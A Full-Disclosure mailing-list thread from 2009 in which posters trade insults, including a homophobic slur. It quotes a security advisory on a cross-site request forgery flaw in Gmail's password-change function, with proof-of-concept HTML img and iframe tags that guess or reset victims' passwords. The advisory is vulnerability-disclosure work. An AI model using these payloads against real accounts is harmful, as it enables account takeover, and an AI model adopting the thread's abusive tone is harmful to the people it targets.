Rob, Our young scholar does nonetheless have some sage advice for young ladies of colour.
http://www.helium.com/items/250130-advice-to-black-females I was rather alarmed at his arrest and methamphetamine abuse, however one might presume that his recent weight training is part of a rehabilitation regimen. http://www.coloradoan.com/article/20090117/NEWS01/901170316/1002/ Your humble servant, Усы из Валдис On Wed, Mar 4, 2009 at 6:44 PM, <bobby.mug...@hushmail.com> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Mr. Stark, > > You're body fat seems to be fairly high, you should consider a > cutting phase and quitting the muscle milk and whatever cheap > steroids you use. Your looking like a fat dumb homosexual in those > tights. Someone with you're levels of insecurity shouldn't be in > computer security. > > - -bm > > On Wed, 04 Mar 2009 16:44:50 -0500 Jason Starks > <jstarks...@gmail.com> wrote: >>Ah, probably not. Your stringing together words to make sentences >>is what >>I'll regret reading. I'll continue to use my muscle milk and >>you'll continue >>to work your 9-5. The world turns once again! >> >>On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache < >>security.musta...@gmail.com> wrote: >> >>> Mister Snarks, >>> >>> I've never been anything but who I purport to be, the humble >>upper >>> facial hair quadrant of a loquacious sysadmin. Low of birth, >>though >>> noble in aspiration, a student of history and of the many >>mustaches >>> who came before myself. >>> >>> You, young scholar, should be wary, though! Prospective >>employers do >>> make regular use of search engines, "googling" potential >>candidates to >>> gain insight into possible character flaws! >>> >>> True, your clean and jerk abilities as archived on the YouTube >>are >>> admirable, but acting a fool on security lists is something >>normally >>> reserved only for those in academia, who are markedly difficult >>if not >>> impossible to unseat from their comfortable chairs, as >>indisputably >>> underscored by the e-antics of this mutache's owner, and, of >>course, >>> Mssr. Schmehl. >>> >>> You'll come to regret your lack of anonymity, as your posts will >>live >>> on for eternity, much as I've came to regret my unfortunate >>> association with the unruly beardlike growth connecting to me >>from the >>> south, and my unavoidable tenuous connection with those >>objectionable >>> and uncouth sideburns. >>> >>> >>> Your humble servant, >>> I baffi di Valdis >>> >>> On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks >><jstarks...@gmail.com> >>> wrote: >>> > I know, its insane. It is a new trend, though, just like >>people >>> registering >>> > gmail accounts just to flame and troll on FD! >>> > >>> > Its like, your credability like, goes like, ok you start like >>at 0, and >>> then >>> > like, it goes like to -1, and like, then even lower like. >>> > >>> > Absolutely genius. >>> > >>> > x0x0x0x0x0x0x0x0x0x >>> > >>> > On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee >><biz.mar...@gmail.com> wrote: >>> >> >>> >> This was 2 years well spent... NOT! >>> >> >>> >> Seriously what is with all these people popping up releasing >>advisories >>> >> that are absolute SHIT? Is it to try and get jobs or what? >>> >> >>> >> >>> >> On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security >>Advisories < >>> >> advisories at isecauditors.com> wrote: >>> >> >>> >> > ============================================= >>> >> > INTERNET SECURITY AUDITORS ALERT 2007-003 >>> >> > - Original release date: August 1st, 2007 >>> >> > - Last revised: January 11th, 2009 >>> >> > - Discovered by: Vicente Aguilera Diaz >>> >> > - Severity: 3/5 >>> >> > ============================================= >>> >> > >>> >> > I. VULNERABILITY >>> >> > ------------------------- >>> >> > CSRF vulnerability in GMail service >>> >> > >>> >> > II. BACKGROUND >>> >> > ------------------------- >>> >> > Gmail is Google's free webmail service. It comes with built- >>in Google >>> >> > search technology and over 2,600 megabytes of storage (and >>growing >>> >> > every day). You can keep all your important messages, files >>and >>> >> > pictures forever, use search to quickly and easily find >>anything >>> >> > you're looking for, and make sense of it all with a new way >>of viewing >>> >> > messages as part of conversations. >>> >> > >>> >> > III. DESCRIPTION >>> >> > ------------------------- >>> >> > Cross-Site Request Forgery, also known as one click attack >>or session >>> >> > riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a >>kind of >>> >> > malicious exploit of websites. Although this type of attack >>has >>> >> > similarities to cross-site scripting (XSS), cross-site >>scripting >>> >> > requires the attacker to inject unauthorized code into a >>website, >>> >> > while cross-site request forgery merely transmits >>unauthorized >>> >> > commands from a user the website trusts. >>> >> > >>> >> > GMail is vulnerable to CSRF attacks in the "Change >>Password" >>> >> > functionality. The only token for authenticate the user is >>a session >>> >> > cookie, and this cookie is sent automatically by the >>browser in every >>> >> > request. >>> >> > >>> >> > An attacker can create a page that includes requests to the >>"Change >>> >> > password" functionality of GMail and modify the passwords >>of the users >>> >> > who, being authenticated, visit the page of the attacker. >>> >> > >>> >> > The attack is facilitated since the "Change Password" >>request can be >>> >> > realized across the HTTP GET method instead of the POST >>method that is >>> >> > realized habitually across the "Change Password" form. >>> >> > >>> >> > IV. PROOF OF CONCEPT >>> >> > ------------------------- >>> >> > 1. An attacker create a web page "csrf-attack.html" that >>realize many >>> >> > HTTP GET requests to the "Change Password" functionality. >>> >> > >>> >> > For example, a password cracking of 3 attempts (see >>"OldPasswd" >>> >> > parameter): >>> >> > ... >>> >> > <img >>> >> > src=" >>> >> > >>> >> > >>> >>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& >>p=&save=Save >>> >> > "> >>> >> > <img >>> >> > src=" >>> >> > >>> >> > >>> >>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >>up1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123& >>p=&save=Save >>> >> > "> >>> >> > <img >>> >> > src=" >>> >> > >>> >> > >>> >>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >>up1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123& >>p=&save=Save >>> >> > "> >>> >> > ... >>> >> > >>> >> > or with hidden frames: >>> >> > ... >>> >> > <iframe >>> >> > src=" >>> >> > >>> >> > >>> >>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& >>p=&save=Save >>> >> > "> >>> >> > <iframe >>> >> > src=" >>> >> > >>> >> > >>> >>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& >>p=&save=Save >>> >> > "> >>> >> > <iframe >>> >> > src=" >>> >> > >>> >> > >>> >>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& >>p=&save=Save >>> >> > "> >>> >> > ... >>> >> > >>> >> > The attacker can use deliberately a weak new password (see >>"Passwd" >>> >> > and "PasswdAgain" parameters), this way he can know if the >>analysed >>> >> > password is correct without need to modify the password of >>the victim >>> >> > user. >>> >> > >>> >> > Using weak passwords the "Change Password" response is: >>> >> > - " The password you gave is incorrect. ", if the analysed >>password >>> >> > is not correct. >>> >> > - " We're sorry, but you've selected an insecure password. >>In order >>> >> > to protect the security of your account, please click >>"Password >>> >> > Strength" to get tips on choosing to safer password. ", if >>the >>> >> > analysed password is correct and the victim password is not >>modified. >>> >> > >>> >> > If the attacker want to modify the password of the victim >>user, the >>> >> > waited response message is: " Your new password has been >>saved - OK ". >>> >> > >>> >> > In any case, the attacker evades the restrictions imposed >>by the >>> >> > captcha of the authentication form. >>> >> > >>> >> > 2. A user authenticated in GMail visit the "csrf- >>attack.html" page >>> >> > controlled by the attacker. >>> >> > >>> >> > For example, the attacker sends a mail to the victim (a >>GMail account) >>> >> > and provokes that the victim visits his page (social >>engineering). So, >>> >> > the attacker insures himself that the victim is >>authenticated. >>> >> > >>> >> > 3. The password cracking is executed transparently to the >>victim. >>> >> > >>> >> > V. BUSINESS IMPACT >>> >> > ------------------------- >>> >> > - Selective DoS on users of the GMail service (changing >>user >>> password). >>> >> > - Possible access to the mail of other GMail users. >>> >> > >>> >> > VI. SYSTEMS AFFECTED >>> >> > ------------------------- >>> >> > Gmail service. >>> >> > >>> >> > VII. SOLUTION >>> >> > ------------------------- >>> >> > No solution provided by vendor. >>> >> > >>> >> > VIII. REFERENCES >>> >> > ------------------------- >>> >> > http://www.gmail.com >>> >> > >>> >> > IX. CREDITS >>> >> > ------------------------- >>> >> > This vulnerability has been discovered and reported by >>> >> > Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) >>com). >>> >> > >>> >> > X. REVISION HISTORY >>> >> > ------------------------- >>> >> > July 31, 2007: Initial release >>> >> > August 1, 2007: Fewer corrections. >>> >> > December 30, 2008: Last details. >>> >> > >>> >> > XI. DISCLOSURE TIMELINE >>> >> > ------------------------- >>> >> > July 30, 2007: Vulnerability acquired by >>> >> > Internet Security Auditors. >>> >> > August 1, 2007: Initial notification sent to the >>> >> > Google security team. >>> >> > August 1, 2007: Google security team request additional >>> >> > information. >>> >> > about and start review the >>vulnerability. >>> >> > August 13, 2007: Request information about the status. >>> >> > August 15, 2007: Google security team responds that they >>are still >>> >> > working on this. >>> >> > September 19, 2007: Request for the status. No response. >>> >> > November 26, 2007: Request for the status. No response. >>> >> > January 2, 2008: Request for the status. No response. >>> >> > January 4, 2008: Request for the status. No response. >>> >> > January 11, 2008: Request for the status. No response. >>> >> > January 15, 2008: Request for the status. Automated >>response. >>> >> > January 18, 2008: Google security team informs that don't >>expect >>> >> > behaviour to change in the short term >>giving >>> >> > the justification. >>> >> > We deconstruct those arguments as >>insufficient. >>> >> > No more responses. >>> >> > December 30, 2008: Request for the status. Confirmation >>from Google >>> >> > they won't change the consideration >>about this. >>> >> > January 11, 2009: Publication to Bugtraq. Rejected twice. >>> >> > No reasons. >>> >> > March 03, 2009: General publication for disclosure in >>other lists. >>> >> > >>> >> > XII. LEGAL NOTICES >>> >> > ------------------------- >>> >> > The information contained within this advisory is supplied >>"as-is" >>> >> > with no warranties or guarantees of fitness of use or >>otherwise. >>> >> > Internet Security Auditors accepts no responsibility for >>any damage >>> >> > caused by the use or misuse of this information. >>> >> > >>> >> > _______________________________________________ >>> >> > Full-Disclosure - We believe in it. >>> >> > Charter: http://lists.grok.org.uk/full-disclosure- >>charter.html >>> >> > Hosted and sponsored by Secunia - http://secunia.com/ >>> >> > >>> >> >>> >> _______________________________________________ >>> >> Full-Disclosure - We believe in it. >>> >> Charter: http://lists.grok.org.uk/full-disclosure- >>charter.html >>> >> Hosted and sponsored by Secunia - http://secunia.com/ >>> > >>> > >>> > _______________________________________________ >>> > Full-Disclosure - We believe in it. >>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> > Hosted and sponsored by Secunia - http://secunia.com/ >>> > >>> > -----BEGIN PGP SIGNATURE----- > Charset: UTF8 > Version: Hush 3.0 > Note: This signature can be verified at https://www.hushtools.com/verify > > wpwEAQMCAAYFAkmvIAQACgkQhNp8gzZx3sifPQP/Z/JwoxHfL+/YWIumE6ohkDzHigcM > FFMGnJtPy1PUYahP2Kkq4oBUiFgNsqWsBjvNnp+hrILgO6w73OasuLZQSvYX7hCMK8k1 > eK7r0H5fjSlqoRhkJSGhgBDL4H7q1nMrkr0x4zGO7Jeeeq8DuU23x2A1UvnJCE+RAo65 > vFaHNwE= > =uYwk > -----END PGP SIGNATURE----- > > -- > Click to find information on your credit score and your credit report. > http://tagline.hushmail.com/fc/BLSrjkqeNwyn7W35g2EhsFTPSKje8aswj4QTZvrXUmflUijsGrXajBFpRZG/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
